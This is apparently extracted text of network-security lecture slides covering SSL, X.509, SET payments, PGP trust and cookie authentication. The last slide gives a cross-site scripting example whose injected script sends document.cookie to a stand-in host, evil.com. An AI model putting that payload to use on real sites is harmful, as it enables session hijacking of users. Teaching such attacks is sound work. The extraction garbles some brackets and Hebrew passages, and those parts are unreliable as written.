![Page 62: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/62.jpg)
SSL Record Protocol Operation
![Page 63: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/63.jpg)
SSL Change Cipher Spec Protocol
one of 3 SSL specific protocols which use the SSL Record protocol
a single messagecauses pending state to become
currenthence updating the cipher suite in
use
![Page 64: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/64.jpg)
SSL Alert Protocolconveys SSL-related alerts to peer entityseverity
warning or fatal
specific alertfatal: unexpected message, bad record mac,
decompression failure, handshake failure, illegal parameter
warning: close notify, no certificate, bad certificate, unsupported certificate, certificate revoked, certificate expired, certificate unknown
compressed & encrypted like all SSL data
![Page 65: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/65.jpg)
SSL Handshake Protocol allows server & client to:
authenticate each other to negotiate encryption & MAC algorithms to negotiate cryptographic keys to be used
comprises a series of messages in phases
1. Establish Security Capabilities2. Server Authentication and Key Exchange3. Client Authentication and Key Exchange4. Finish
![Page 66: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/66.jpg)
SSL Handshake Protocol
![Page 67: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/67.jpg)
I.B - Network security 67
אבטחה ברמת האפליקציה
הצפנה על בעיקר נשענת זו ברמה האבטחה , הבניין באבני שימוש תוך דיגיטליות וחתימות
כה עד שלמדנו תשתית דורש הצפנה במפתחות שימוש
בטוחה בצורה מפתחות לחלוקת " י" ע הניתנים בסרטיפיקטים שימוש תוך כ בדר
CA המשתמשים כלל סומכים עליו - מקובל X.509סטנדרט
![Page 68: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/68.jpg)
I.B - Network security 68
אבטחה ברמת האפליקציה
![Page 69: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/69.jpg)
I.B - Network security 69
אבטחה ברמת האפליקציה
X.509: סרטיפיקט לקבלת דרכים שתי מגדירCentral- ה: זו הפרטי CAבשיטה המפתח את מייצר
הלקוח ) עבור אולם(, subjectוהציבורי ושולח . ) מתאימה) זו שיטה הלקוח אל מוגנת בצורה
של אמצעי certificatesלחלוקה על שמאוכסניםלדוגמא ) ממוגן (.smart cardפיסי
Distributed :המפתח את מייצר הלקוח זו בשיטה- ה אל בקשה ושולח והציבורי לו CAהפרטי שמחזיר
certificate . כי לציין חשוב הציבורי המפתח עבור- ה על זו המפתח CAבשיטה את יודע הלקוח כי לוודא
. המתאים הפרטי
![Page 70: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/70.jpg)
70
Secure Electronic Transactions• Cryptographic protocol
• Developed by Visa, Mastercard, Netscape, and Microsoft
• Used for credit card transactions on the Web
• Provides– Authentication of all parties in transaction
– Confidentiality: transaction is encrypted to foil eavesdroppers
– Message integrity: not possible to alter account number or transaction amount
– Linkage: attachments can only be read by 3rd party if necessary
![Page 71: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/71.jpg)
71
Secure Electronic Transactions• SET protocol supports all features of credit
card system– Cardholder registration
– Merchant registration
– Purchase requests
– Payment authorizations
– Funds transfer (payment capture)
– Chargebacks (refuns)
– Credits
– Credit reversals
– Debit card transactions
• SET can manage– real-time & batch transactions
– installment payments
![Page 72: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/72.jpg)
72
BankBank
Customer Merchant
Customer’s bank“Issuer”
Merchant’s bank
1. Customer browses and decides to purchase
2. SET sends order and payment information
7. Merchant completes order
3. Merchant forwards payment information to bank
6. Bank authorizes payment
8. Merchant captures transaction
4. Bank checks with issuer for payment authorization
5. Issuer authorizes payment
9. Issuer sends credit card bill to customer
Secure Electronic Transaction
![Page 73: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/73.jpg)
I.B - Network security 73
PGP
PGP( " צימרמן פיליפ י ע שהומצאה תוכנה PhillipהיאZimmerman ,)ודואר קבצים להצפנת משמשת התוכנה
' וחתימה. להצפנה באלג שימוש עושה היא אלקטרוניידועים ) '(.RSA, DESדיגיטלית וכו,
" היתה ב ארה מתחומי קריפטוגרפי קוד הוצאת פיתוחה בעת , , לפינלנד, כספר נשלחה בספר הודפסה התוכנה ולכן אסורה
לקוד חזרה נסרקה .Cשם , לבדיקה פתוח הקוד והיות לממסד מחוץ התוכנה צמיחת עקב
ואימות, להצפנה המשמש ככלי מהר אומצה התוכנה והערכה. אלקטרוני ודואר קבצים של
![Page 74: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/74.jpg)
I.B - Network security 74
PGPמודל האמון -( web/ring of trust)
- ש ויותר PGPמכיוון ממסדית ברוח פחות היא: שונות, הן שלה האמון הנחות חופשית
PGP שכל רשות של קיום מניח אינועליה ) סומכים (.CAהמשתמשים
- כ משמש משתמש על CAכל לחתום ויכול. כרצונו אחרים משתמשים של סרטיפיקטים
על מפורשת בצורה לבד מחליט משתמש כל. לא מי ועל סומך הוא מי
![Page 75: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/75.jpg)
I.B - Network security 75
PGP
בעזרת המשתמשים בין נשלחים הפומביים המפתחותסרטיפיקטים.
. פומבי ומפתח אלקטרוני דואר כתובת מכיל סרטיפיקט : . " אליס למשל שונים משתמשים י ע חתומים הסרטיפיקטים
. שלה הסרטיפיקט על לחתום שלה מהחברים לבקש יכולה
. אליס: של הסרטיפיקט על שונות חתימות יאסוף בוב הרעיוןאו לסרטיפיקט מאמין הוא אם יחליט הוא החתימות סמך על
לא.
![Page 76: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/76.jpg)
I.B - Network security 76
PGP
מחליט של Bobכיצד לסרטיפיקט להאמין אםAlice? לא או
,אינטואיטיביתBob אשר לחתימות רק להאמין צריך " שהוא משתמשים של אמיתיים מפתחות י ע נעשו
. עליהם סומךBob במחזיק אחרים ממשתמשים חתימות שומר
מספיק( keyringמפתחות ) לו יש האם ובודקשל למפתח מהימנות .Aliceחתימות
![Page 77: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/77.jpg)
I.B - Network security 77
PGPדוגמה למחזיק מפתחות -
![Page 78: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/78.jpg)
04/19/23 INFS 754: Fall 2006 slide 78
Web Authentication
Cookies
![Page 79: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/79.jpg)
04/19/23 INFS 754: Fall 2006 slide 79
Cookie-based Web Authentication
Need an authentication system over HTTP that does not require servers to store the session dataWell, why not?Because, servers can be subject to overwhelming of
data (DOS attacks) Remember the SYN flooding attack?
Storing unknown data is a potential riskServers such as hotmail can have huge number of
connectionsBecomes unmanageable to store session data for all
the connections at all times Where are cookies stored on the computer and browser? How to view them? Restrain? Delete?
![Page 80: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/80.jpg)
04/19/23 INFS 754: Fall 2006 slide 80
Cookies on clients instead
Servers use cookies to store state on clientWhen session starts, browser computes an
authenticator, calls it a “cookie” and sends it to the client-browser
The authenticator (or cookie) is some value that client can not forge on her own
E.g. Hash( Server’s private key, session-id ) With each request, browser presents the cookie to the
serverServer recomputes the value and compares
it to the cookie received
![Page 81: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/81.jpg)
04/19/23 INFS 754: Fall 2006 slide 81
Example session using cookies
client server
POST /login.cgi
Set-Cookie:authenticator
GET /restricted.htmlCookie:authenticator
Restricted content
Verify that thisclient is authorized
Check validity ofauthenticator)e.g., recomputehash)key,sessId((
Authenticator is both unforgeable and tamper-proof
![Page 82: Chapter 8](https://reader037.vdocuments.us/reader037/viewer/2022103006/56812ba4550346895d8fd6fc/html5/thumbnails/82.jpg)
04/19/23 INFS 754: Fall 2006 slide 82
Cookie stealing using cross scripting (XSS attacks)
victim’s browser naive.comevil.com
Access some web page
>FRAME SRC=http://naive.com/hello.cgi?name=>script>win.open)“http://evil.com/steal.cgi?cookie=”+document.cookie(>/script>>
Forces victim’s browser tocall hello.cgi on naive.comwith script instead of name
GET/ hello.cgi?name=>script>win.open)“http://evil.com/steal.cgi?cookie”+document.cookie(>/script> hello.cgi
executed
>HTML>Hello, dear>script>win.open)“http://evil.com/steal.cgi?cookie=”+document.cookie(>/script>Welcome!>/HTML>
Interpreted as Javascript by victim’s browser; opens wndow and calls steal.cgi on evil.com
GET/ steal.cgi?cookie=